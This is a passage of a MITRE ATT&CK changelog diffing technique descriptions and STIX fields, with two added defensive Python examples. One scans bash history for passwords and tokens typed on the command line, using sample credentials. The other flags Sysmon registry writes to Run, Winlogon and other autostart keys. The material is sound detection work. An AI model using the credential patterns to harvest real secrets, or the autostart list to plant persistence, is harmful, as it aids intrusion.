can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016) |
| external_references[1]['source_name'] | Microsoft COM | CTU BITS Malware June 2016 |
| external_references[1]['description'] | Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017. | Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018. |
| external_references[1]['url'] | https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx | https://www.secureworks.com/blog/malware-lingers-with-bits |
| external_references[2]['source_name'] | Microsoft BITS | Symantec BITS May 2007 |
| external_references[2]['description'] | Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018. | Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018. |
| external_references[2]['url'] | https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx | https://www.symantec.com/connect/blogs/malware-update-windows-update |
| external_references[3]['source_name'] | Microsoft BITSAdmin | Elastic - Hunting for Persistence Part 1 |
| external_references[3]['description'] | Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/aa362813.aspx | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 |
| external_references[4]['source_name'] | CTU BITS Malware June 2016 | PaloAlto UBoatRAT Nov 2017 |
| external_references[4]['description'] | Counter Threat Unit Research Team. (2016, June 6). Malware Lingers with BITS. Retrieved January 12, 2018. | Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. |
| external_references[4]['url'] | https://www.secureworks.com/blog/malware-lingers-with-bits | https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ |
| external_references[5]['source_name'] | Mondok Windows PiggyBack BITS May 2007 | Microsoft Issues with BITS July 2011 |
| external_references[5]['description'] | Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018. | Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. |
| external_references[5]['url'] | https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ | https://technet.microsoft.com/library/dd939934.aspx |
| external_references[6]['source_name'] | Symantec BITS May 2007 | Microsoft BITS |
| external_references[6]['description'] | Florio, E. (2007, May 9). Malware Update with Windows Update. Retrieved January 12, 2018. | Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018. |
| external_references[6]['url'] | https://www.symantec.com/connect/blogs/malware-update-windows-update | https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx |
| external_references[7]['source_name'] | PaloAlto UBoatRAT Nov 2017 | Microsoft BITSAdmin |
| external_references[7]['description'] | Hayashi, K. (2017, November 28). UBoatRAT Navigates East Asia. Retrieved January 12, 2018. | Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018. |
| external_references[7]['url'] | https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/ | https://msdn.microsoft.com/library/aa362813.aspx |
| external_references[8]['source_name'] | Microsoft Issues with BITS July 2011 | Microsoft COM |
| external_references[8]['description'] | Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018. | Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017. |
| external_references[8]['url'] | https://technet.microsoft.com/library/dd939934.aspx | https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx |
| external_references[9]['source_name'] | Elastic - Hunting for Persistence Part 1 | Mondok Windows PiggyBack BITS May 2007 |
| external_references[9]['description'] | French, D., Murphy, B. (2020, March 24). Adversary tradecraft 101: Hunting for persistence using Elastic Security (Part 1). Retrieved December 21, 2020. | Mondok, M. (2007, May 11). Malware piggybacks on Windows’ Background Intelligent Transfer Service. Retrieved January 12, 2018. |
| external_references[9]['url'] | https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 | https://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/ |
| x_mitre_data_sources[1] | Network Traffic: Network Connection Creation | Service: Service Metadata |
| x_mitre_data_sources[2] | Service: Service Metadata | Network Traffic: Network Connection Creation |
| x_mitre_version | 1.2 | 1.3 |
| Old Description | New Description |
|---|---|
| Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) | Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-07 20:48:49.878000+00:00 | 2022-03-08 21:34:44.728000+00:00 |
| description | Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) | Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way) |
| x_mitre_data_sources[0] | File: File Access | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | File: File Access |
| x_mitre_version | 1.0 | 1.1 |
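The bash-history description above names the artifact but not what a sweep of it looks like. The following Python is an added example written for this page, not code from ATT&CK or from the cited "External to DA" post. It reads a history file, normalises zsh's extended-history prefix, and reports lines where a credential was passed on the command line, redacting the value in the report. The history contents, host names and secrets are constructed for the example, and the pattern list is an illustrative starting point rather than an exhaustive one.

```python
import re
from typing import Dict, List

# Constructed sample of a ~/.bash_history file; none of these hosts or secrets are real.
SAMPLE_HISTORY = """\
ls -la
mysql -u root -pS3cretDB! -h db.internal
curl -u deploy:hunter2 https://repo.example.internal/artifact.tgz
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
sshpass -p 'Winter2024!' ssh admin@10.0.0.5
git clone https://user:ghp_abcdef0123456789@github.internal/org/repo.git
echo "PASSWORD=changeme" >> .env
sudo systemctl restart nginx
"""

# Each pattern captures one way a credential ends up on the command line.
# The named group "secret" marks the value to redact in the report.
PATTERNS = [
    ("mysql -p<password>",
     re.compile(r"\bmysql\b.*?\s-p(?P<secret>\S+)")),
    ("curl/wget -u user:password",
     re.compile(r"\b(?:curl|wget)\b.*?\s(?:-u|--user)[ =](?P<user>[^:\s]+):(?P<secret>\S+)")),
    ("sshpass -p <password>",
     re.compile(r"\bsshpass\b.*?\s-p\s*'?(?P<secret>[^'\s]+)")),
    ("exported secret in environment variable",
     re.compile(r"\bexport\s+(?P<name>\w*(?:SECRET|TOKEN|PASSWORD|PASSWD|API_KEY)\w*)=(?P<secret>\S+)", re.I)),
    ("credential embedded in a URL",
     re.compile(r"https?://(?P<user>[^:/\s]+):(?P<secret>[^@\s]+)@")),
    ("password literal written to a file",
     re.compile(r"(?:PASSWORD|PASSWD)=(?P<secret>[^\s\"']+)", re.I)),
]

# zsh with EXTENDED_HISTORY prefixes each entry with ": <epoch>:<elapsed>;".
ZSH_PREFIX = re.compile(r"^: \d+:\d+;")


def redact(secret: str) -> str:
    """Keep two leading characters for correlation and mask the rest."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one finding per history line that carries a credential."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = ZSH_PREFIX.sub("", raw).strip()
        if not line:
            continue
        for label, pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                findings.append({
                    "line": lineno,
                    "kind": label,
                    "command": line.split()[0],
                    "secret": redact(match.group("secret")),
                })
                break  # one finding per line is enough for triage
    return findings


if __name__ == "__main__":
    import os
    path = os.path.expanduser("~/.bash_history")
    try:
        with open(path, encoding="utf-8", errors="replace") as fh:
            data = fh.read()
    except FileNotFoundError:
        data = SAMPLE_HISTORY  # fall back to the constructed sample
    for f in scan_history(data):
        print(f"line {f['line']:>5}  {f['kind']:<40} {f['command']}  secret={f['secret']}")
```

Two caveats for anyone running this as an audit. Bash only writes the file at logout unless `PROMPT_COMMAND` calls `history -a`, so a live session's commands are not yet on disk; and a user with `HISTCONTROL=ignorespace` or a `HISTIGNORE` pattern can keep individual commands out of the file entirely, so an empty result is not proof that nothing was typed. Root can read every user's history file, which is exactly why the technique works after privilege escalation.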
| Old Description | New Description |
|---|---|
| Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | |
| external_references | CAPEC-564 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-564 | |
| external_references | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-19 04:03:47.056000+00:00 | 2022-04-18 22:21:27.840000+00:00 |
| description | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. | Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. |
| external_references[1]['source_name'] | capec | Cylance Reg Persistence Sept 2013 |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/564.html | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order |
| external_references[2]['source_name'] | Microsoft Run Key | MSDN Authentication Packages |
| external_references[2]['description'] | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. |
| external_references[2]['url'] | http://msdn.microsoft.com/en-us/library/aa376977 | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx |
| external_references[3]['source_name'] | MSDN Authentication Packages | Microsoft Run Key |
| external_references[3]['description'] | Microsoft. (n.d.). Authentication Packages. Retrieved March 1, 2017. | Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. |
| external_references[3]['url'] | https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx | http://msdn.microsoft.com/en-us/library/aa376977 |
| external_references[5]['source_name'] | Cylance Reg Persistence Sept 2013 | Linux Kernel Programming |
| external_references[5]['description'] | Langendorf, S. (2013, September 24). Windows Registry Persistence, Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018. | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. |
| external_references[5]['url'] | https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf |
| external_references[6]['source_name'] | Linux Kernel Programming | TechNet Autoruns |
| external_references[6]['description'] | Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018. | Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. |
| external_references[6]['url'] | https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf | https://technet.microsoft.com/en-us/sysinternals/bb963902 |
| external_references[7]['source_name'] | TechNet Autoruns | capec |
| external_references[7]['url'] | https://technet.microsoft.com/en-us/sysinternals/bb963902 | https://capec.mitre.org/data/definitions/564.html |
| x_mitre_data_sources[0] | File: File Creation | Process: Process Creation |
| x_mitre_data_sources[1] | Windows Registry: Windows Registry Key Creation | Driver: Driver Load |
| x_mitre_data_sources[2] | Windows Registry: Windows Registry Key Modification | Windows Registry: Windows Registry Key Creation |
| x_mitre_data_sources[3] | File: File Modification | Kernel: Kernel Module Load |
| x_mitre_data_sources[4] | Command: Command Execution | Module: Module Load |
| x_mitre_data_sources[5] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[7] | Kernel: Kernel Module Load | File: File Creation |
| x_mitre_data_sources[8] | Driver: Driver Load | File: File Modification |
| Description |
|---|
| Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 19:58:02.332000+00:00 | 2022-04-01 19:04:02.610000+00:00 |
| x_mitre_data_sources[0] | Windows Registry: Windows Registry Key Creation | Active Directory: Active Directory Object Modification |
| x_mitre_data_sources[2] | Command: Command Execution | File: File Creation |
| x_mitre_data_sources[3] | Active Directory: Active Directory Object Modification | Command: Command Execution |
| x_mitre_data_sources[4] | File: File Creation | File: File Modification |
| x_mitre_data_sources[5] | File: File Modification | Windows Registry: Windows Registry Key Creation |
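The autostart description above (Run keys, authentication packages, time providers) and the initialization-script description that follows it both list Windows Registry key creation and modification as data sources. The Python below is an added example for both passages, written for this page rather than taken from ATT&CK or the cited Microsoft and Cylance material. It runs a watchlist of boot and logon registry locations over Sysmon registry events (Event ID 12 for key create/delete, 13 for value set) and raises the severity when the value written points into a user-writable directory. The event records are constructed, the field names are the Sysmon ones a SIEM would carry, and the user-writable heuristic is this example's own assumption, not a vendor rule.

```python
import re
from typing import Dict, List

# Registry locations that start code at boot or logon. The first four are autostart
# mechanisms (Run/RunOnce, Winlogon, LSA authentication packages, W32Time providers);
# the last is the per-user logon script value that userinit.exe runs at logon.
AUTOSTART_WATCHLIST = [
    ("Run/RunOnce key",
     re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once|OnceEx)?\\", re.I)),
    ("Winlogon Shell/Userinit",
     re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon\\(?:Shell|Userinit)$", re.I)),
    ("LSA authentication package",
     re.compile(r"\\Control\\Lsa\\Authentication Packages$", re.I)),
    ("W32Time time provider DLL",
     re.compile(r"\\Services\\W32Time\\TimeProviders\\[^\\]+\\DllName$", re.I)),
    ("Logon script (UserInitMprLogonScript)",
     re.compile(r"\\Environment\\UserInitMprLogonScript$", re.I)),
]

# Heuristic (an assumption of this example, not a vendor rule): a launch path under a
# user-writable directory is a stronger signal than one under Program Files or System32.
USER_WRITABLE = re.compile(r"\\(?:Users\\[^\\]+\\AppData|Users\\Public|ProgramData|Temp)\\", re.I)

# Constructed Sysmon records (Event ID 12 = key create/delete, 13 = value set),
# reduced to the fields the detection needs. Hosts, users and paths are invented.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "User": r"CORP\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\setup.exe", "User": r"CORP\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\OneDriveUpdate",
     "Details": r"C:\Users\alice\AppData\Roaming\svc\update.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\ProgramData\helper.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe", "User": r"NT AUTHORITY\LOCAL SERVICE",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTime",
     "Details": "QWORD (0x01da6b2f-0x8c3e1a40)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "User": r"CORP\alice",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\UserInitMprLogonScript",
     "Details": r"C:\Users\alice\AppData\Roaming\logon.bat"},
    {"EventID": 12, "Image": r"C:\Windows\System32\msiexec.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\InstallCleanup",
     "Details": ""},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\Authentication Packages",
     "Details": r"msv1_0 C:\Windows\Temp\pkg.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe", "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient\DllName",
     "Details": r"C:\Users\Public\w32time.dll"},
]


def detect_autostart_writes(events: List[Dict[str, object]]) -> List[Dict[str, str]]:
    """Flag registry writes that land in a boot/logon autostart or logon-script location."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in (12, 13):
            continue
        target = str(ev.get("TargetObject", ""))
        for rule, pattern in AUTOSTART_WATCHLIST:
            if not pattern.search(target):
                continue
            details = str(ev.get("Details", ""))
            alerts.append({
                "rule": rule,
                "severity": "high" if USER_WRITABLE.search(details) else "medium",
                "target": target,
                "value": details,
                "writer": str(ev.get("Image", "")),
                "user": str(ev.get("User", "")),
            })
            break  # one rule per event is enough
    return alerts


if __name__ == "__main__":
    for a in detect_autostart_writes(SAMPLE_EVENTS):
        print(f"[{a['severity']:<6}] {a['rule']:<40} {a['writer']}  -> {a['target']}  = {a['value']}")
```

The medium-severity hit from msiexec.exe writing RunOnce is the kind of result an installer produces legitimately; the watchlist deliberately keeps it so the analyst sees the write, while the path heuristic separates it from the Run, Userinit, authentication-package and time-provider writes that point into AppData, ProgramData, Temp or Public. Sysmon only records what its configuration includes, so the registry paths above must be in the RegistryEvent filter for these events to exist at all.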
| Old Description | New Description |
|---|---|
| Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:01:00.271000+00:00 | 2022-04-19 15:55:58.319000+00:00 |
| description | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). | Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS). |
| external_references[1]['source_name'] | Norton Botnet | Dell Dridex Oct 2015 |
| external_references[1]['description'] | Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019. |
| external_references[1]['url'] | https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html | https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation |
| external_references[3]['source_name'] | Dell Dridex Oct 2015 | Norton Botnet |
| external_references[3]['description'] | Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019. | Norton. (n.d.). What is a botnet?. Retrieved October 4, 2020. |
| external_references[3]['url'] | https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation | https://us.norton.com/internetsecurity-malware-what-is-a-botnet.html |
| Old Description | New Description |
|---|---|
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition) Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS) Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. 
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence.(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension)
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 19:56:54.161000+00:00 | 2022-04-20 16:46:36.707000+00:00 |
| description | Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
Once the extension is installed, it can browse to websites in the background,(Citation: Chrome Extension Crypto Miner)(Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser (including credentials)(Citation: Banker Google Chrome Extension Steals Creds)(Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence.
There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions.(Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control.(Citation: Chrome Extension C2 Malware) |
